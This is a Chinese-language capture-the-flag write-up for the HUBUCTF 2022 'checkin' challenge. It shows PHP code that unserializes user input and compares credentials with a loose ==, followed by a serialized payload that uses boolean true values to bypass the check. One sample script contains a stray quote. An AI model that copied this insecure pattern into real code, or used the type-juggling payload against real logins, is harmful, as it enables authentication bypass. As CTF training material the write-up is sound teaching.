[HUBUCTF 2022 新生赛]checkin Leaderchen的WriteUp

<?php
show_source(__FILE__);
$username  = "this_is_secret"; 
$password  = "this_is_not_known_to_you"; 
include("flag.php");//here I changed those two 
$info = isset($_GET['info'])? $_GET['info']: "" ;
$data_unserialize = unserialize($info);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;
}else{
    echo "username or password error!";

}

​

代码分析：

定义一个数组，username="this_is_secret" password="this_is_not_known_to_you"

再反序列化

<?php
$ab=array(
    'username'=>"this_is_secret",
	'password'=>"this_is_not_known_to_you"
);
$b=serialize($ab);
echo $b;
?>
​

输入：

?info=a:2:{s:8:"username";s:14:"this_is_secret";s:8:"password";s:24:"this_is_not_known_to_you";}
​

显示：username or password error!

忽略了源代码中的：include("flag.php");//here I changed those two

这里的==是一个弱比较

因为ture类型和什么都比较都为真

所以：

<?php
$ab=array(
    'username'=>true,
	'password'=>true"
);
$b=serialize($ab);
echo $b;
?>
​

?info=a:2:{s:8:"username";b:1;s:8:"password";b:1;}
​

显示flag